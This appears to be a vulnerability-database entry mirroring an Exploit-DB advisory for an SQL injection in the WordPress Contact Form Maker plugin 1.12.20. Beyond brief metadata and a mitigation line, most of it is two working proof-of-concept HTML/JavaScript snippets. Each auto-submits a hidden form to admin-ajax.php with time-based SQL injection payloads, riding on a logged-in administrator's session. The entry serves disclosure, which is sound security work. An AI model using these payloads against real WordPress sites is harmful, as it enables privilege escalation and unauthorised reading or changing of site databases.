WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection

vendor:

WordPress Contact Form Maker plugin

by:

Neven Biruski

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WordPress Contact Form Maker plugin

Affected Version From: 1.12.20 and below

Affected Version To: Not provided

Patch Exists: YES

Related CWE: Not provided

CPE: a:wordpress_contact_form_maker_project:wordpress_contact_form_maker:1.12.20

Metasploit:

Other Scripts:

Platforms Tested:

2018

WordPress Contact Form Maker Plugin 1.12.20 – SQL Injection

The WordPress Contact Form Maker Plugin version 1.12.20 and below is vulnerable to SQL Injection. By sending specially crafted requests to the plugin settings page, an attacker with appropriate privileges can exploit these vulnerabilities to escalate their privileges or modify database contents.

Mitigation:

Update to the latest version of the WordPress Contact Form Maker plugin to fix the SQL Injection vulnerability.

Source

Exploit-DB raw data:

# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Contact Form Maker plugin
# Software link: https://wordpress.org/plugins/contact-form-maker/
# Version: 1.12.20 and below

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.


# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>